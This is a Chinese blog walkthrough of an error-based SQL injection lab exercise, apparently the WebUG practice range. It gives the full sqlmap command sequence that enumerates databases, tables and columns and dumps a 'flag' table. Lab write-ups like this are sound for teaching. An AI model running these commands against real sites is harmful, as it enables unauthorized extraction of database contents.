01显错注入
106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1
那么我们在?id=1 后面加一个' 也就是?id=1'
查看是否报错
这里利用sqlmap注入
sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" --dbs #查询数据库
一路输入Y即可,如下图,爆出数据库。
第一次扫描同一网站下需要时间,我这里第二次扫描发现直接把上一次扫描结果搬过来了。
然后我们爆出表
sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug --tables
爆出表结构和数据
sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug -T flag --columns
sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug -T flag -C "id,flag" --dump
然后去提交flag试试看
OK 搞定
版权声明 ©
本文内容来自若白博客:R-Blog.cn
文章链接:https://r-blog.cn/202206252553.html
转载请注明出处
原创不易,觉得有用的话,请转发保留版权信息表示支持!
THE END
14
二维码
打赏
海报


01显错注入
打开靶场后的链接是
106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1
那么我们在?id=1 后面加一个' 也就是?id=1'
查看是否报错
这里显示错误……

共有 0 条评论